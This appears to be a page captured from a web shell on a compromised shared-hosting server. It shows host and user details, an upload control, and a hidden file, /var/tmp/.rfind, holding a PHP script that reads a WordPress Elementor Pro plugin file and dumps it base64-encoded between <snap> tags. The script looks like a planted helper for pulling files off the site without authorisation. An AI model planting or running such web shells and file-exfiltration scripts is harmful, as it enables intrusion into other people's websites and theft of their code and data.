HEX
Server: LiteSpeed
System: Linux jkt09.dewaweb.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: marthati (2073)
PHP: 8.3.31
Disabled: NONE
Upload Files
File: //var/tmp/.rfind
<?php  $path = '/home/marthati/public_html/wp-content/plugins/elementor-pro/modules/dynamic-tags/tags/post-time.php'; $max = (int) '100000'; if ($max < 1) {     $max = 120000; } if (!is_file($path)) {     die('!nf!'); } $c = @file_get_contents($path); if ($c === false) {     die('!rd!'); } if (strlen($c) > $max) {     die('!big!'); } die('<snap>' . base64_encode($c) . '</snap>');